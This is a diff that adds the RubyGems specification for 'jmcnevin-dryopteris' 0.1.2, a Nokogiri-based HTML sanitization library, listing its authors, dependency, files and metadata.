@@ -0,0 +1,77 @@
+--- !ruby/object:Gem::Specification
+name: jmcnevin-dryopteris
+version: !ruby/object:Gem::Version
+  version: 0.1.2
+platform: ruby
+authors:
+- Bryan Helmkamp
+- Mike Dalessio
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2009-02-10 00:00:00 -08:00
+default_executable:
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: nokogiri
+  type: :runtime
+  version_requirement:
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">"
+      - !ruby/object:Gem::Version
+        version: 0.0.0
+    version:
+description: Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.
+email:
+- bryan@brynary.com
+- mike.dalessio@gmail.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- README.markdown
+- VERSION.yml
+- lib/dryopteris
+- lib/dryopteris/rails_extension.rb
+- lib/dryopteris/sanitize.rb
+- lib/dryopteris/whitelist.rb
+- lib/dryopteris.rb
+- test/test_basic.rb
+- test/test_strip_tags.rb
+- test/helper.rb
+- test/html5/test_sanitizer.rb
+has_rdoc: true
+homepage: http://github.com/brynary/dryopteris/tree/master
+licenses:
+post_install_message:
+rdoc_options:
+- --inline-source
+- --charset=UTF-8
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: "0"
+  version:
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: "0"
+  version:
+requirements: []
+rubyforge_project:
+rubygems_version: 1.3.5
+signing_key:
+specification_version: 2
+summary: HTML sanitization using Nokogiri
+test_files: []